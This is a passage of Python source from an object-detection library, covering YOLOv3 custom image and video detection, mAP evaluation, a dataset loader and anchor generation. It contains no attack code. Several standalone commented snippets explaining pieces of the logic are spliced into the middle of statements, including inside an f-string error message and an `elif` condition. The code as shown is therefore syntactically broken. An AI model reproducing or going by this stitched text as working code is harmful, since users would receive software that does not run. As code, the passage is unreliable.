None:\r\n\r\n self.__load_classes_and_anchors()\r\n\r\n if self.__model_type == \"yolov3\":\r\n self.__model = YoloV3(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes),\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"tiny-yolov3\":\r\n self.__model = YoloV3Tiny(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes),\r\n device=self.__device\r\n )\r\n else:\r\n raise ValueError(\r\n f\"Invalid model type. Call setModelTypeAsYOLOv3() or setModelTypeAsTinyYOLOv3() to set a model type before loading the model\")\r\n\r\n self.__model.to(self.__device)\r\n\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n try:\r\n self.__model.load_state_dict(state_dict)\r\n self.__model_loaded = True\r\n self.__model.to(self.__device).eval()\r\n except Exception as e:\r\n raise RuntimeError(f\"Invalid weights!!! 
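# A compact, standalone version of the input normalization the loader above
# performs: file path, numpy array, or PIL image, all reduced to one BGR
# ndarray. Function and variable names here are illustrative.
import os
import numpy as np
import cv2 as cv
from PIL import Image

def to_bgr_ndarray(input_image, allowed_exts=("jpg", "jpeg", "png")):
    if isinstance(input_image, str):
        if not (os.path.isfile(input_image)
                and input_image.rsplit(".", 1)[-1].lower() in allowed_exts):
            raise ValueError(f"image path '{input_image}' is not found or a valid file")
        return cv.imread(input_image)
    if isinstance(input_image, np.ndarray):
        return input_image  # assumed already BGR, OpenCV channel order
    if isinstance(input_image, Image.Image):
        return cv.cvtColor(np.asarray(input_image), cv.COLOR_RGB2BGR)
    raise ValueError("Invalid image input format")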
{e}\")\r\n\r\n def detectObjectsFromImage(self,\r\n input_image: Union[str, np.ndarray, Image.Image],\r\n output_image_path: str = None,\r\n output_type: str = \"file\",\r\n extract_detected_objects: bool = False, minimum_percentage_probability: int = 40,\r\n display_percentage_probability: bool = True, display_object_name: bool = True,\r\n display_box: bool = True,\r\n custom_objects: List = None,\r\n nms_treshold: float = 0.4,\r\n objectness_treshold: float = 0.4,\r\n ) -> Union[\r\n List[List[Tuple[str, float, Dict[str, int]]]], np.ndarray, List[np.ndarray], List[str]]:\r\n\r\n self.__nms_score = nms_treshold\r\n self.__objectness_score = objectness_treshold\r\n\r\n self.__model.eval()\r\n if not self.__model_loaded:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path is yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n raise RuntimeError(\r\n \"Model path isn't set, pretrained weights aren't used.\"\r\n )\r\n\r\n predictions = defaultdict(lambda: [])\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n fnames, original_imgs, input_dims, imgs = self.__load_image_yolo(input_image)\r\n\r\n with torch.no_grad():\r\n output = self.__model(imgs)\r\n\r\n output = get_predictions(\r\n pred=output.to(self.__device), num_classes=len(self.__classes),\r\n nms_confidence_level=self.__nms_score, objectness_confidence=self.__objectness_score,\r\n device=self.__device\r\n )\r\n\r\n if output is None:\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return original_imgs[0], [], []\r\n else:\r\n return original_imgs[0], []\r\n else:\r\n if extract_detected_objects:\r\n return original_imgs[0], []\r\n else:\r\n return []\r\n\r\n\r\n input_dims = torch.index_select(input_dims, 0, output[:, 0].long())\r\n scaling_factor = torch.min(416 / input_dims, 1)[0].view(-1, 1)\r\n output[:, [1, 3]] -= (416 - (scaling_factor * input_dims[:, 0].view(-1, 1))) / 2\r\n output[:, [2, 4]] -= (416 - (scaling_factor * input_dims[:, 1].view(-1, 1))) / 2\r\n output[:, 1:5] /= scaling_factor\r\n\r\n\r\n for idx in range(output.shape[0]):\r\n output[idx, [1, 3]] = torch.clamp(output[idx, [1, 3]], 0.0, input_dims[idx, 0])\r\n output[idx, [2, 4]] = torch.clamp(output[idx, [2, 4]], 0.0, input_dims[idx, 1])\r\n\r\n for pred in output:\r\n pred_label = self.__classes[int(pred[-1])]\r\n if custom_objects:\r\n if pred_label.replace(\" \", \"_\") in custom_objects.keys():\r\n if not custom_objects[pred_label.replace(\" \", \"_\")]:\r\n continue\r\n else:\r\n continue\r\n predictions[int(pred[0])].append((\r\n pred_label,\r\n float(pred[-2]),\r\n {k: v for k, v in zip([\"x1\", \"y1\", \"x2\", \"y2\"], map(int, pred[1:5]))},\r\n ))\r\n\r\n\r\n original_input_image = None\r\n output_image_array = None\r\n extracted_objects = []\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n original_input_image = cv.cvtColor(original_imgs[0], cv.COLOR_RGB2BGR)\r\n if isinstance(output, torch.Tensor):\r\n for pred in output:\r\n percentage_conf = round(float(pred[-2]) * 100, 2)\r\n if percentage_conf < minimum_percentage_probability:\r\n continue\r\n\r\n displayed_label = \"\"\r\n if display_object_name:\r\n displayed_label = f\"{self.__classes[int(pred[-1].item())]} : \"\r\n if display_percentage_probability:\r\n displayed_label += f\" {percentage_conf}%\"\r\n\r\n original_imgs[int(pred[0].item())] = draw_bbox_and_label(pred[1:5].int() if display_box else None,\r\n 
displayed_label,\r\n original_imgs[int(pred[0].item())]\r\n )\r\n output_image_array = cv.cvtColor(original_imgs[0], cv.COLOR_RGB2BGR)\r\n\r\n\r\n predictions_batch = list(predictions.values())\r\n predictions_list = predictions_batch[0] if len(predictions_batch) > 0 else []\r\n min_probability = minimum_percentage_probability / 100\r\n\r\n if output_type == \"file\":\r\n if output_image_path:\r\n cv.imwrite(output_image_path, output_image_array)\r\n\r\n if extract_detected_objects:\r\n extraction_dir = \".\".join(output_image_path.split(\".\")[:-1]) + \"-extracted\"\r\n os.mkdir(extraction_dir)\r\n count = 0\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n count += 1\r\n extracted_path = os.path.join(\r\n extraction_dir,\r\n \".\".join(os.path.basename(output_image_path).split(\".\")[:-1]) + f\"-{count}.jpg\"\r\n )\r\n obj_bbox = obj_prediction[2]\r\n cv.imwrite(extracted_path, original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"],\r\n obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n\r\n extracted_objects.append(extracted_path)\r\n\r\n elif output_type == \"array\":\r\n if extract_detected_objects:\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n obj_bbox = obj_prediction[2]\r\n\r\n extracted_objects.append(\r\n original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"], obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n else:\r\n raise ValueError(f\"Invalid output_type '{output_type}'. Supported values are 'file' and 'array' \")\r\n\r\n predictions_list = [\r\n {\r\n \"name\": prediction[0], \"percentage_probability\": round(prediction[1] * 100, 2),\r\n \"box_points\": [prediction[2][\"x1\"], prediction[2][\"y1\"], prediction[2][\"x2\"], prediction[2][\"y2\"]]\r\n } for prediction in predictions_list if prediction[1] >= min_probability\r\n ]\r\n\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return output_image_array, predictions_list, extracted_objects\r\n else:\r\n return output_image_array, predictions_list\r\n else:\r\n if extract_detected_objects:\r\n return predictions_list, extracted_objects\r\n else:\r\n return predictions_list\r\n\r\n\r\nclass CustomVideoObjectDetection:\r\n\r\n def __init__(self):\r\n self.__detector = CustomObjectDetection()\r\n\r\n def setModelTypeAsYOLOv3(self):\r\n self.__detector.setModelTypeAsYOLOv3()\r\n\r\n def setModelTypeAsTinyYOLOv3(self):\r\n self.__detector.setModelTypeAsTinyYOLOv3()\r\n\r\n def setModelPath(self, model_path: str):\r\n extension_check(model_path)\r\n self.__detector.setModelPath(model_path)\r\n\r\n def setJsonPath(self, configuration_json: str):\r\n self.__detector.setJsonPath(configuration_json)\r\n\r\n def loadModel(self):\r\n self.__detector.loadModel()\r\n\r\n def useCPU(self):\r\n self.__detector.useCPU()\r\n\r\n def detectObjectsFromVideo(self, input_file_path=\"\", camera_input=None, output_file_path=\"\", frames_per_second=20,\r\n frame_detection_interval=1, minimum_percentage_probability=40, log_progress=False,\r\n display_percentage_probability=True, display_object_name=True, display_box=True,\r\n save_detected_video=True,\r\n per_frame_function=None, per_second_function=None, per_minute_function=None,\r\n video_complete_function=None, return_detected_frame=False, detection_timeout=None):\r\n\r\n\r\n if (input_file_path == \"\" and camera_input == None):\r\n raise ValueError(\r\n \"You must set 'input_file_path' to a valid video file, or set 'camera_input' to a valid camera\")\r\n elif (save_detected_video == True and 
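# The object-extraction step above is plain numpy slicing on the BGR frame:
# rows are y, columns are x. Minimal sketch with an illustrative detection:
import numpy as np
import cv2 as cv

frame = np.zeros((480, 640, 3), dtype=np.uint8)        # stand-in BGR image
obj_bbox = {"x1": 50, "y1": 80, "x2": 210, "y2": 300}  # hypothetical box
crop = frame[obj_bbox["y1"]:obj_bbox["y2"], obj_bbox["x1"]:obj_bbox["x2"]]
print(crop.shape)                 # (220, 160, 3)
cv.imwrite("object-1.jpg", crop)  # illustrative output path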
output_file_path == \"\"):\r\n raise ValueError(\r\n \"You must set 'output_video_filepath' to a valid video file name, in which the detected video will be saved. If you don't intend to save the detected video, set 'save_detected_video=False'\")\r\n\r\n else:\r\n\r\n output_frames_dict = {}\r\n output_frames_count_dict = {}\r\n\r\n input_video = cv.VideoCapture(input_file_path)\r\n if (camera_input != None):\r\n input_video = camera_input\r\n\r\n output_video_filepath = output_file_path + '.mp4'\r\n\r\n frame_width = int(input_video.get(3))\r\n frame_height = int(input_video.get(4))\r\n output_video = cv.VideoWriter(output_video_filepath, cv.VideoWriter_fourcc(*\"MP4V\"),\r\n frames_per_second,\r\n (frame_width, frame_height))\r\n\r\n counting = 0\r\n\r\n detection_timeout_count = 0\r\n video_frames_count = 0\r\n\r\n while (input_video.isOpened()):\r\n ret, frame = input_video.read()\r\n\r\n if (ret == True):\r\n\r\n video_frames_count += 1\r\n if (detection_timeout != None):\r\n if ((video_frames_count % frames_per_second) == 0):\r\n detection_timeout_count += 1\r\n\r\n if (detection_timeout_count >= detection_timeout):\r\n break\r\n\r\n output_objects_array = []\r\n\r\n counting += 1\r\n\r\n if (log_progress == True):\r\n print(\"Processing Frame : \", str(counting))\r\n\r\n detected_copy = frame.copy()\r\n\r\n check_frame_interval = counting % frame_detection_interval\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n try:\r\n detected_copy, output_objects_array = self.__detector.detectObjectsFromImage(\r\n input_image=frame, output_type=\"array\",\r\n minimum_percentage_probability=minimum_percentage_probability,\r\n display_percentage_probability=display_percentage_probability,\r\n display_object_name=display_object_name,\r\n display_box=display_box)\r\n\r\n except Exception as e:\r\n warnings.warn()\r\n\r\n if (save_detected_video == True):\r\n output_video.write(detected_copy)\r\n\r\n if detected_copy is not None and output_objects_array is not None:\r\n\r\n output_frames_dict[counting] = output_objects_array\r\n\r\n output_objects_count = {}\r\n for eachItem in output_objects_array:\r\n eachItemName = eachItem[\"name\"]\r\n try:\r\n output_objects_count[eachItemName] = output_objects_count[eachItemName] + 1\r\n except:\r\n output_objects_count[eachItemName] = 1\r\n\r\n output_frames_count_dict[counting] = output_objects_count\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n if (per_frame_function != None):\r\n if (return_detected_frame == True):\r\n per_frame_function(counting, output_objects_array, output_objects_count,\r\n detected_copy)\r\n elif (return_detected_frame == False):\r\n per_frame_function(counting, output_objects_array, output_objects_count)\r\n\r\n if (per_second_function != None):\r\n if (counting != 1 and (counting % frames_per_second) == 0):\r\n\r\n this_second_output_object_array = []\r\n this_second_counting_array = []\r\n this_second_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - frames_per_second)):\r\n this_second_output_object_array.append(output_frames_dict[aa + 1])\r\n this_second_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_second_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_second_counting[eachItem] = this_second_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_second_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_second_counting:\r\n 
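# The reader/writer plumbing used above, as a minimal sketch. Property ids
# 3 and 4 passed to input_video.get() are cv.CAP_PROP_FRAME_WIDTH and
# cv.CAP_PROP_FRAME_HEIGHT; the writer must be created with the same frame
# size or frames are silently dropped. "input.mp4" is a placeholder path.
import cv2 as cv

cap = cv.VideoCapture("input.mp4")
w = int(cap.get(cv.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv.CAP_PROP_FRAME_HEIGHT))
out = cv.VideoWriter("output.mp4", cv.VideoWriter_fourcc(*"MP4V"), 20, (w, h))
while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        break
    out.write(frame)  # a detector would annotate `frame` first
cap.release()
out.release()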
this_second_counting[eachCountingItem] = int(\r\n this_second_counting[eachCountingItem] / frames_per_second)\r\n\r\n if (return_detected_frame == True):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, this_second_counting_array,\r\n this_second_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, this_second_counting_array,\r\n this_second_counting)\r\n\r\n if (per_minute_function != None):\r\n\r\n if (counting != 1 and (counting % (frames_per_second * 60)) == 0):\r\n\r\n this_minute_output_object_array = []\r\n this_minute_counting_array = []\r\n this_minute_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - (frames_per_second * 60))):\r\n this_minute_output_object_array.append(output_frames_dict[aa + 1])\r\n this_minute_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_minute_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_minute_counting[eachItem] = this_minute_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_minute_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_minute_counting:\r\n this_minute_counting[eachCountingItem] = int(\r\n this_minute_counting[eachCountingItem] / (frames_per_second * 60))\r\n\r\n if (return_detected_frame == True):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting)\r\n else:\r\n break\r\n\r\n if (video_complete_function != None):\r\n\r\n this_video_output_object_array = []\r\n this_video_counting_array = []\r\n this_video_counting = {}\r\n\r\n for aa in range(counting):\r\n this_video_output_object_array.append(output_frames_dict[aa + 1])\r\n this_video_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_video_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_video_counting[eachItem] = this_video_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_video_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_video_counting:\r\n this_video_counting[eachCountingItem] = int(this_video_counting[eachCountingItem] / counting)\r\n\r\n video_complete_function(this_video_output_object_array, this_video_counting_array,\r\n this_video_counting)\r\n\r\n input_video.release()\r\n output_video.release()\r\n\r\n if (save_detected_video == True):\r\n return output_video_filepath\r\n\r\n\r\ndef xywh2xyxy(box_coord: torch.Tensor):\r\n n = box_coord.clone()\r\n n[:, 0] = (box_coord[:, 0] - (box_coord[:, 2] / 2))\r\n n[:, 1] = (box_coord[:, 1] - (box_coord[:, 3] / 2))\r\n n[:, 2] = (box_coord[:, 0] + (box_coord[:, 2] / 2))\r\n n[:, 3] = (box_coord[:, 1] + (box_coord[:, 3] / 2))\r\n\r\n return n\r\n\r\n\r\ndef process_batch(detections, labels, iouv):\r\n detections[:, [1, 3]] = torch.clamp(detections[:, [1, 3]], 0.0, 416)\r\n detections[:, [2, 4]] = torch.clamp(detections[:, [2, 4]], 0.0, 416)\r\n\r\n correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)\r\n iou = box_iou(labels[:, 1:], 
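# Worked numbers for xywh2xyxy above: a center-format box
# (cx, cy, w, h) = (100, 100, 40, 20) becomes corner format (80, 90, 120, 110).
import torch
box = torch.tensor([[100.0, 100.0, 40.0, 20.0]])
print(xywh2xyxy(box))  # tensor([[ 80.,  90., 120., 110.]])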
detections[:, 1:5])\r\n x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 7])) \r\n if x[0].shape[0]:\r\n matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() \r\n if x[0].shape[0] > 1:\r\n matches = matches[matches[:, 2].argsort()[::-1]]\r\n matches = matches[np.unique(matches[:, 1], return_index=True)[1]]\r\n matches = matches[np.unique(matches[:, 0], return_index=True)[1]]\r\n matches = torch.Tensor(matches).to(iouv.device)\r\n correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv\r\n return correct\r\n\r\n\r\n@torch.no_grad()\r\ndef run(model, val_dataloader, num_class, net_dim=416, nms_thresh=0.6, objectness_thresh=0.001, device=\"cpu\"):\r\n model.eval()\r\n nc = int(num_class) \r\n iouv = torch.linspace(0.5, 0.95, 10).to(device) \r\n niou = iouv.numel()\r\n\r\n p, r, f1, mp, mr, map50, map = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\r\n stats, ap, ap_class = [], [], []\r\n\r\n for batch_i, (im, targets) in tqdm(enumerate(val_dataloader)):\r\n im = im.to(device)\r\n targets = targets.to(device)\r\n nb = im.shape[0] \r\n\r\n \r\n out = model(im) \r\n\r\n \r\n targets[:, 2:] *= torch.Tensor([net_dim, net_dim, net_dim, net_dim]).to(device) \r\n out = get_predictions(\r\n pred=out.to(device), num_classes=nc,\r\n objectness_confidence=objectness_thresh,\r\n nms_confidence_level=nms_thresh, device=device\r\n )\r\n\r\n \r\n for si in range(nb):\r\n labels = targets[targets[:, 0] == si, 1:]\r\n pred = out[out[:, 0] == si, :] if isinstance(out, torch.Tensor) else torch.zeros((0, 0), device=device)\r\n nl = len(labels)\r\n tcls = labels[:, 0].tolist() if nl else []\r\n\r\n if len(pred) == 0:\r\n if nl:\r\n stats.append((torch.zeros(0, niou, dtype=torch.bool, device=\"cpu\"), torch.Tensor(device=\"cpu\"),\r\n torch.Tensor(device=\"cpu\"), tcls))\r\n continue\r\n\r\n \r\n if nc == 1:\r\n pred[:, 7] = 0\r\n\r\n if pred.shape[0] > 300:\r\n pred = pred[:300, :]\r\n\r\n predn = pred.clone()\r\n\r\n \r\n if nl:\r\n tbox = xywh2xyxy(labels[:, 1:5]).to(device) \r\n labelsn = torch.cat((labels[:, 0:1], tbox), 1).to(device) \r\n correct = process_batch(predn, labelsn, iouv)\r\n else:\r\n correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)\r\n stats.append((correct.cpu(), pred[:, 5].cpu(), pred[:, 7].cpu(), tcls)) \r\n\r\n\r\n stats = [np.concatenate(x, 0) for x in zip(*stats)] \r\n if len(stats) and stats[0].any():\r\n p, r, ap, f1, ap_class = ap_per_class(*stats)\r\n ap50, ap = ap[:, 0], ap.mean(1)\r\n mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()\r\n\r\n return mp, mr, map50, map\r\ndef ap_per_class(tp, conf, pred_cls, target_cls):\r\n\r\n\r\n i = np.argsort(-conf)\r\n tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]\r\n\r\n\r\n unique_classes = np.unique(target_cls)\r\n nc = unique_classes.shape[0]\r\n\r\n\r\n px = np.linspace(0, 1, 1000)\r\n ap, p, r = np.zeros((nc, tp.shape[1])), np.zeros((nc, 1000)), np.zeros((nc, 1000))\r\n for ci, c in enumerate(unique_classes):\r\n i = pred_cls == c\r\n n_l = (target_cls == c).sum()\r\n n_p = i.sum()\r\n\r\n if n_p == 0 or n_l == 0:\r\n continue\r\n else:\r\n\r\n fpc = (1 - tp[i]).cumsum(0)\r\n tpc = tp[i].cumsum(0)\r\n\r\n\r\n recall = tpc / (n_l + 1e-16) \r\n r[ci] = np.interp(-px, -conf[i], recall[:, 0], left=0)\r\n\r\n precision = tpc / (tpc + fpc) \r\n p[ci] = np.interp(-px, -conf[i], precision[:, 0], left=1)\r\n\r\n\r\n for j in range(tp.shape[1]):\r\n ap[ci, j], mpre, mrec = compute_ap(recall[:, j], precision[:, j])\r\n\r\n\r\n f1 = 2 * p * r / (p + r + 1e-16)\r\n i = 
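# The ten IoU thresholds used by run() above come from
# torch.linspace(0.5, 0.95, 10), i.e. 0.50, 0.55, ..., 0.95 -- so map50 is AP
# at the first threshold and map averages AP over all ten (COCO-style
# mAP@0.5:0.95). Quick check:
import torch
iouv = torch.linspace(0.5, 0.95, 10)
print([round(v, 2) for v in iouv.tolist()])  # [0.5, 0.55, ..., 0.95]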
f1.mean(0).argmax()\r\n\r\n return p[:, i], r[:, i], ap, f1[:, i], unique_classes.astype('int32')\r\n\r\n\r\ndef compute_ap(recall, precision):\r\n\r\n mrec = np.concatenate(([0.0], recall, [1.0]))\r\n mpre = np.concatenate(([1.0], precision, [0.0]))\r\n\r\n\r\n mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))\r\n\r\n\r\n x = np.linspace(0, 1, 101)\r\n ap = np.trapz(np.interp(x, mrec, mpre), x) \r\n\r\n return ap, mpre, mrec\r\n\r\nclass LoadImagesAndLabels(Dataset):\r\n\r\n def __init__(self, path: str, net_dim=(416, 416), train=True):\r\n if not os.path.isdir(path):\r\n raise NotADirectoryError(\"path is not a valid directory!!!\")\r\n\r\n super().__init__()\r\n\r\n if train:\r\n path = os.path.join(path, \"train\")\r\n else:\r\n path = os.path.join(path, \"validation\")\r\n\r\n self.__net_width, self.__net_height = net_dim\r\n self.__images_paths = []\r\n self.shapes = []\r\n self.labels = []\r\n for img in os.listdir(os.path.join(path, \"images\")):\r\n p = os.path.join(path, \"images\", img)\r\n image = cv.imread(p)\r\n if isinstance(image, np.ndarray):\r\n l_p = self.__img_path2label_path(p)\r\n self.__images_paths.append(p)\r\n self.shapes.append((image.shape[1], image.shape[0]))\r\n self.labels.append(self.__load_raw_label(l_p))\r\n\r\n self.__nsamples = len(self.__images_paths)\r\n self.shapes = np.array(self.shapes)\r\n\r\n def __len__(self) -> int:\r\n return self.__nsamples\r\n\r\n def __img_path2label_path(self, path: str) -> str:\r\n im, lb = os.sep + \"images\" + os.sep, os.sep + \"annotations\" + os.sep\r\n return lb.join(path.rsplit(im, 1)).rsplit(\".\", 1)[0] + \".txt\"\r\n\r\n def __getitem__(self, idx) -> Tuple[torch.Tensor, torch.Tensor]:\r\n if idx >= self.__nsamples:\r\n raise IndexError(\"Index out of range.\")\r\n image_path = self.__images_paths[idx]\r\n label = self.labels[idx].copy()\r\n image, label = self.__load_data(image_path, label)\r\n return image, label\r\n\r\n def __xywhn2xyxy(self, nlabel: torch.Tensor, width: int, height: int) -> torch.Tensor:\r\n label = nlabel.clone()\r\n label[:, 1] = (nlabel[:, 1] - (nlabel[:, 3] / 2)) * width\r\n label[:, 2] = (nlabel[:, 2] - (nlabel[:, 4] / 2)) * height\r\n label[:, 3] = (nlabel[:, 1] + (nlabel[:, 3] / 2)) * width\r\n label[:, 4] = (nlabel[:, 2] + (nlabel[:, 4] / 2)) * height\r\n\r\n return label\r\n\r\n def __load_data(self, img_path: str, label: np.ndarray) -> Tuple[torch.Tensor, torch.Tensor]:\r\n img = cv.imread(img_path)\r\n img_h, img_w = img.shape[:2]\r\n img = prepare_image(img[:, :, :3], [self.__net_width, self.__net_height])\r\n lab = self.__process_label(label, img_w, img_h)\r\n return img.squeeze(), lab\r\n\r\n def __load_raw_label(self, label_path: str):\r\n if os.path.isfile(label_path):\r\n with warnings.catch_warnings():\r\n l = np.loadtxt(label_path).reshape(-1, 5)\r\n assert (l >= 0).all(), \"bounding box values should be positive and in range 0 - 1\"\r\n assert (l[:, 1:] <= 1).all(), \"bounding box values should be in the range 0 - 1\"\r\n else:\r\n l = np.zeros((0, 5), dtype=np.float32)\r\n return l\r\n\r\n def __process_label(self, label: np.ndarray, image_width: int, image_height: int) -> torch.Tensor:\r\n\r\n scaling_factor = min(\r\n self.__net_width / image_width,\r\n self.__net_width / image_height\r\n )\r\n\r\n bs = torch.zeros((len(label), 6))\r\n if label.size > 0:\r\n nlabels = torch.from_numpy(label)\r\n labels = self.__xywhn2xyxy(nlabels, image_width, image_height)\r\n\r\n labels[:, [1, 3]] = ((labels[:, [1, 3]] * scaling_factor) + \\\r\n (self.__net_width - (image_width * 
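# compute_ap above first makes precision monotonically non-increasing (the
# "envelope") via flip + maximum.accumulate, then integrates over a fixed
# 101-point recall grid. Tiny standalone check of the envelope step:
import numpy as np
mpre = np.array([1.0, 0.5, 0.8, 0.2, 0.0])
envelope = np.flip(np.maximum.accumulate(np.flip(mpre)))
print(envelope)  # [1.  0.8 0.8 0.2 0. ] -- each point >= everything to its right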
scaling_factor)) / 2)\r\n labels[:, [2, 4]] = ((labels[:, [2, 4]] * scaling_factor) + \\\r\n (self.__net_width - (image_height * scaling_factor)) / 2)\r\n\r\n\r\n label_copy = labels.clone()\r\n labels[:, 1] = (label_copy[:, 3] + label_copy[:, 1]) / 2\r\n labels[:, 2] = (label_copy[:, 4] + label_copy[:, 2]) / 2\r\n labels[:, 3] = (label_copy[:, 3] - label_copy[:, 1])\r\n labels[:, 4] = (label_copy[:, 4] - label_copy[:, 2])\r\n\r\n\r\n labels[:, 1:5] /= self.__net_width\r\n bs[:, 1:] = labels[:, :]\r\n return bs\r\n\r\n def collate_fn(self, batch) -> Tuple[torch.Tensor, torch.Tensor]:\r\n batch = [data for data in batch if data is not None]\r\n imgs, bboxes = list(zip(*batch))\r\n\r\n imgs = torch.stack(imgs)\r\n\r\n for i, boxes in enumerate(bboxes):\r\n boxes[:, 0] = i\r\n bboxes = torch.cat(bboxes, 0)\r\n\r\n return imgs, bboxes\r\ndef generate_anchors(dataset, n=9, img_size=416, thr=4.0, gen=1000, verbose=True):\r\n thr = 1 / thr\r\n\r\n def metric(k, wh):\r\n r = wh[:, None] / k[None]\r\n x = torch.min(r, 1 / r).min(2)[0]\r\n return x, x.max(1)[0] \r\n\r\n def anchor_fitness(k):\r\n _, best = metric(torch.tensor(k, dtype=torch.float32), wh)\r\n return (best * (best > thr).float()).mean()\r\n\r\n def print_results(k, verbose=True):\r\n k = k[np.argsort(k.prod(1))]\r\n if verbose:\r\n x, best = metric(k, wh0)\r\n bpr, aat = (best > thr).float().mean(), (x > thr).float().mean() * n \r\n s = f'thr={thr:.2f}: {bpr:.4f} best possible recall, {aat:.2f} anchors past thr\\n' \\\r\n f'n={n}, img_size={img_size}, metric_all={x.mean():.3f}/{best.mean():.3f}-mean/best, ' \\\r\n f'past_thr={x[x > thr].mean():.3f}-mean: '\r\n print(s)\r\n return k\r\n shapes = img_size * dataset.shapes / dataset.shapes.max(1, keepdims=True)\r\n wh0 = np.concatenate([l[:, 3:5] * s for s, l in zip(shapes, dataset.labels)]) \r\n\r\n \r\n i = (wh0 < 3.0).any(1).sum()\r\n if i and verbose:\r\n print(f'WARNING: Extremely small objects found. 
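# collate_fn above stacks images and concatenates all label rows into one
# (N, 6) tensor, writing each sample's batch index into column 0 so losses
# and metrics can route rows back to their image. Minimal sketch:
import torch

def collate(batch):
    imgs, bboxes = zip(*[b for b in batch if b is not None])
    for i, boxes in enumerate(bboxes):
        boxes[:, 0] = i  # batch index in column 0
    return torch.stack(imgs), torch.cat(bboxes, 0)

batch = [(torch.zeros(3, 416, 416), torch.zeros(2, 6)),  # 2 boxes, image 0
         (torch.zeros(3, 416, 416), torch.zeros(1, 6))]  # 1 box, image 1
imgs, targets = collate(batch)
print(imgs.shape, targets[:, 0].tolist())  # [2, 3, 416, 416] and [0.0, 0.0, 1.0]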
{i} of {len(wh0)} labels are < 3 pixels in size.')\r\n wh = wh0[(wh0 >= 2.0).any(1)] \r\n\r\n s = wh.std(0) \r\n k, dist = kmeans(wh / s, n, iter=30) \r\n assert len(k) == n, f'ERROR: scipy.cluster.vq.kmeans requested {n} points but returned only {len(k)}'\r\n k *= s\r\n wh = torch.tensor(wh, dtype=torch.float32) \r\n wh0 = torch.tensor(wh0, dtype=torch.float32) \r\n k = print_results(k, verbose=False)\r\n\r\n \r\n npr = np.random\r\n f, sh, mp, s = anchor_fitness(k), k.shape, 0.9, 0.1 \r\n if verbose:\r\n print(\"Generating anchor boxes for training images...\")\r\n for _ in range(gen):\r\n v = np.ones(sh)\r\n while (v == 1).all(): \r\n v = ((npr.random(sh) < mp) * random.random() * npr.randn(*sh) * s + 1).clip(0.3, 3.0)\r\n kg = (k.copy() * v).clip(min=2.0)\r\n fg = anchor_fitness(kg)\r\n if fg > f:\r\n f, k = fg, kg.copy()\r\n\r\n return print_results(k)\r\n\r\nclass ImageReadMode(Enum):\r\n\r\n UNCHANGED = 0\r\n GRAY = 1\r\n GRAY_ALPHA = 2\r\n RGB = 3\r\n RGB_ALPHA = 4\r\n\r\n\r\nclass ObjectDetection:\r\n\r\n\r\n def __init__(self) -> None:\r\n self.__device: str = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__nms_score: float = 0.4\r\n self.__objectness_score: float = 0.5\r\n self.__anchors: List[int] = None\r\n self.__anchors_yolov3: List[int] = [10, 13, 16, 30, 33, 23, 30, 61, 62, 45, 59, 119, 116, 90, 156, 198, 373,\r\n 326]\r\n self.__anchors_tiny_yolov3: List[int] = [10, 14, 23, 27, 37, 58, 81, 82, 135, 169, 344, 319]\r\n\r\n self.__classes = self.__load_classes(\r\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"coco_classes.txt\"))\r\n self.__model_type = 